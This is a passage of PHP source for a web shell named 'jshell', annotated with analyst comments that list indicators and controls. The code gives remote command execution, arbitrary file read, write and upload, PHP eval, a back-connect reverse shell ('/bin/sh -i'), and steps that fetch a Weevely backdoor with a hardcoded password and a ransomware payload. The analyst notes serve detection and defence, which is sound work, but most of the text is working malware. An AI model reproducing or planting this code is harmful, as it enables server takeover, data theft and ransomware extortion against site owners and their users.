  652.     $delt = (empty($jfilez)) ? $jpaptt : $jpaptt.'/'.$jfilez;
  653.     if($js->Jdel($delt)){
  654.     echo "<b> Successfully deleted files ~ </b>";
  655.     echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  656.     }else{
  657.       echo $delt."<br/>";
  658.       echo "<b> Failed delete files ~ </b>";
  659.     echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  660.    
  661.     }
  662.   }elseif ($_GET['jshell_act'] == 'ren') {
       // 'ren': rename directory/file to the name given in the "n" parameter.
  663.     $fold = $jpaptt.'/'.$jfilez;
  664.     $fnew = $jpaptt.'/'.$_GET['n'];
  665.     if(@rename($fold,$fnew))
  666.     {
  667.     echo "<b> Successfully rename files ~ </b>";
  668.     echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  669.     }else{
  670.     echo "<b> Failed rename files ~ </b>";
  671.     echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  672.     }
  673.  
  674.   }
  675. elseif($_GET['jshell_act'] == 'edit')
  676. {
       // 'edit': show the file in a textarea; a POST with "save" overwrites the
       // file with the submitted "editfile" content. Analyst note: this is an
       // arbitrary file write anywhere the PHP process has write permission.
  677.   $baselink = '?jshell_path='.$jpaptt.'&jshell_file='.$jfilez.'&jshell_act=';
  678.   $js->Jtitle('Edit file');
  679.    echo "<ul>Files :<b> ".$jfilez."</b> | Owner:group : <b>".$js->Jgetowner($jpaptt.'/'.$jfilez).":".$js->Jgetgroup($jpaptt.'/'.$jfilez)."</b> | Permission : <b>".$js->Jgetperms($jpaptt.'/'.$jfilez)."</b> | Date modified : <b>".$js->Jgetdmod($jpaptt.'/'.$jfilez)."</b> | Action :: <li>[<a href=\"javascript:menuklik('".$baselink."edit')\">Edit</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."del')\">Delete</a>]</li><li>[<a href=\"javascript:rename('".$jpaptt."','".$jfilez."')\">Rename</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."dl')\">Download</a>]</li></ul>";
  680.   $js->Jshell_act('edit',htmlspecialchars(file_get_contents($jpaptt.'/'.$jfilez)));
  681.   if(isset($_POST['save']))
  682.   {
  683.     $fp = $jpaptt.'/'.$jfilez;
  684.     $content = $_POST['editfile'];
  685.     if($js->Jwrite($fp,$content))
  686.     {
  687.        echo "<b> Successfully Edit files ~ </b>";
  688.     }else{
  689.       echo "<b>Failed Edit files ~ </b>";
  690.     }
  691.   }
  692. }
  693.   elseif ($_GET['jshell_act'] == 'view') {
       // 'view': print the file, syntax-highlighted. Analyst note: an arbitrary
       // file read for anything the PHP process can open (configuration files,
       // credentials stored on disk).
  694.     $js->Jtitle('View file');
  695.     $baselink = '?jshell_path='.$jpaptt.'&jshell_file='.$jfilez.'&jshell_act=';
  696.     echo "<ul>Files :<b> ".$jfilez."</b> | Owner:group : <b>".$js->Jgetowner($jpaptt.'/'.$jfilez).":".$js->Jgetgroup($jpaptt.'/'.$jfilez)."</b> | Permission : <b>".$js->Jgetperms($jpaptt.'/'.$jfilez)."</b> | Date modified : <b>".$js->Jgetdmod($jpaptt.'/'.$jfilez)."</b> | Action :: <li>[<a href=\"javascript:menuklik('".$baselink."edit')\">Edit</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."del')\">Delete</a>]</li><li>[<a href=\"javascript:rename('".$jpaptt."','".$jfilez."')\">Rename</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."dl')\">Download</a>]</li></ul>";
  697.    echo $js->Jvf($jpaptt.'/'.$jfilez);
  698.   }
  699.   elseif($_GET['jshell_act'] == 'logout')
  700.   {
  701.    session_destroy();
  702.   }elseif ($_GET['jshell_act'] == 'cmd') {
       // 'cmd': the POSTed "cmd" string is handed to Jcmd() and its output is
       // printed. Analyst note: command text travels in the POST body, so a
       // default access log shows only the URL with jshell_act=cmd; request-body
       // logging or WAF inspection is needed to see what was run.
  703.     $js->Jtitle('Command Shell');
  704.     $js->Jshell_act('cmd');
  705.     if(isset($_POST['exec'])){
  706.       echo "<pre class='code'>";
  707.       echo $js->Jcmd($_POST['cmd']);
  708.       echo "</pre>";
  709.     }
  710.   }elseif($_GET['jshell_act'] == 'upl')
  711.   {
       // 'upl': each uploaded file is stored under the POSTed "jdirz" directory
       // using the client-supplied file name, with no type or name checks.
  712.     $js->Jtitle('Uploader');
  713.     $js->Jshell_act('upl');
  714.     if(isset($_POST['upload'])){
  715.       echo "<pre class='code'>";
  716.       $file_up = $js->array_upload($_FILES['jfilez']);
  717.       foreach($file_up as $filup){
  718.         if($js->Jupl($filup['tmp_name'],$_POST['jdirz']."/".$filup['name'])){
  719.           $res_upl.="Successfuly Upload file : ".$_POST['jdirz']."/".$filup['name'];
  720.         }else{
  721.           $res_upl.="Failed to upload file !";}
  722.         }
  723.         echo $res_upl."<br/></pre>";
  724.       }
  725.   }elseif ($_GET['jshell_act'] == 'wev') {
       // 'wev': fetch the 'weevely' URL from src_link and save it as Jweevely.php
       // in the current working directory. Analyst note: that file name, and the
       // outbound request made by the server to fetch it, are both indicators.
  726.     $js->Jtitle('Weevely remote shell backdoor');
  727.     if($js->Jcaller($js->src_link['weevely'],'Jweevely.php'))
  728.     {
  729.       echo "<center><b>Successfuly called <a href='Jweevely.php' target='_blank'>Jweevely.php</a> !!</b><br/>";
  730.       echo "<p>password :: jshellv1 ,<br/> open your terminal and remote weevely :D </p>";
  731.       echo "<pre>$ weevely http://".$_SERVER['HTTP_HOST']."/".dirname($_SERVER['PHP_SELF'])."/Jweevely.php jshellv1 </pre>";
  732.     }else{
  733.       echo "request failed";
  734.     }
  735.    
  736.   }elseif ($_GET['jshell_act'] == 'lc') {
       // 'lc': render the local-root helper page (search form and links).
  737.     $js->Jtitle('Localroot');
  738.     $js->Jshell_act('lc');
  739.   }elseif($_GET['jshell_act'] == 'net')
  740.   {
       // 'net': open a TCP connection from the server to the POSTed ip and port.
       // Analyst note: the connection originates from the web server towards an
       // address chosen by the requester; default-deny egress rules for web
       // servers and alerts on unexpected outbound sessions cover this branch.
  741.     $js->Jtitle('BackConnect');
  742.     $js->Jshell_act('bc');
  743.     if(isset($_POST['sbmt']))
  744.     {
  745.       $sock=fsockopen($_POST['ip'],$_POST['port']);
  746.       if($sock)
  747.       {
  748.         echo "<center>Connection estabilished~</center> <br>";
  749.       }else{
  750.         echo "<center>Connection failed</center><br>";
  751.       }
  752.       $js->cmd("/bin/sh -i <&3 >&3 2>&3");
  753.     }
  754.   }elseif($_GET['jshell_act'] == 'rans')
  755.   {
       // 'rans': fetch the 'ransomware' URL from src_link and save it as
       // s57rsw.php in the current working directory (file-name indicator).
  756.      $js->Jtitle('Ransomware ');
  757.     if($js->Jcaller($js->src_link['ransomware'],'s57rsw.php'))
  758.     {
  759.       echo "<center><b>Successfuly called <a href='s57rsw.php' target='_blank'>s57rsw.php</a> !!</b><br/>";
  760.     }else{
  761.       echo "request failed";
  762.     }
  763.   }elseif($_GET['jshell_act'] == 'php')
  764.   {
       // 'php': the POSTed "code" string is passed to eval(). Analyst note: eval
       // is a language construct rather than a function, so disable_functions
       // does not block it; this branch keeps working on hosts where the
       // command-execution functions have been disabled. Preventing the file
       // from being written or executed (no PHP execution in writable
       // directories, file-integrity monitoring) is the control that applies.
  765.     $js->Jtitle('Eval PHP');
  766.    
  767.     if(isset($_POST['sbmt']))
  768.     {
  769.       echo "<hr>";
  770.       @eval($_POST['code']);
  771.       echo "<hr>";
  772.       $js->Jshell_act('php');
  773.     }else{
  774.       $js->Jshell_act('php');
  775.     }
  776.   }
  777. }
  778. ?>